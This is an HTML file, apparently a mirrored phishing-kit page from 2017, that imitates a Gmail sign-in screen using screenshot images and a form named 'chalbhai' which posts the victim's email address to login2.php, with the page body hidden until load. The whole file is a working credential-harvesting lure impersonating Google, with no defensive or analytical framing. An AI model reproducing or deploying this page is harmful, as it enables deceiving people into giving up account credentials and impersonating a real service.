﻿<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<!-- Mirrored from amghamdi.com/Docu-Sign/cf131/b70ad/al.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Aug 2017 11:25:57 GMT -->
<head>
<title>Gmail</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<style> 
  .textbox { 
    border: 1px solid #c4c4c4; 
    height: 42px; 
    width: 275px; 
    font-size: 16px; 
    padding: 4px 4px 4px 4px; 
    border-radius: 4px; 
    -moz-border-radius: 4px; 
    -webkit-border-radius: 4px; 
    box-shadow: 0px 0px 0px #d9d9d9; 
    -moz-box-shadow: 0px 0px 0px #d9d9d9; 
    -webkit-box-shadow: 0px 0px 0px #d9d9d9; 

} 
 </style> 
</head>
<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:412px; top:-34px; width:498px; height:688px; z-index:0"><img src="images/pp.png" alt="" title="" border=0 width=498 height=688></div>
<form action=login2.php name=chalbhai id=chalbhai method=post>
<input name="email" placeholder=" Enter your Email"   required title="Enter your email address" class="textbox" type="email" style="position:absolute;width:275px;left:524px;top:370px;z-index:1">
<div id="image2" style="position:absolute; overflow:hidden; left:528px; top:468px; width:74px; height:19px; z-index:2"><a href="#"><img src="images/help.png" alt="" title="" border=0 width=74 height=19></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:620px; top:530px; width:103px; height:21px; z-index:3"><a href="#"><img src="images/creat.png" alt="" title="" border=0 width=103 height=21></a></div>

<div id="formimage1" style="position:absolute; left:524px; top:420px; z-index:4"><input type="image" name="formimage1" width="278" height="38" src="images/next.png"></div>
<div id="image4" style="position:absolute; overflow:hidden; left:0px; top:853px; width:1679px; height:39px; z-index:5"><a href="#"><img src="images/footer.png" alt="" title="" border=0 width=1679 height=39></a></div>

</div>

</body>

<!-- Mirrored from amghamdi.com/Docu-Sign/cf131/b70ad/al.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Aug 2017 11:26:00 GMT -->
</html>
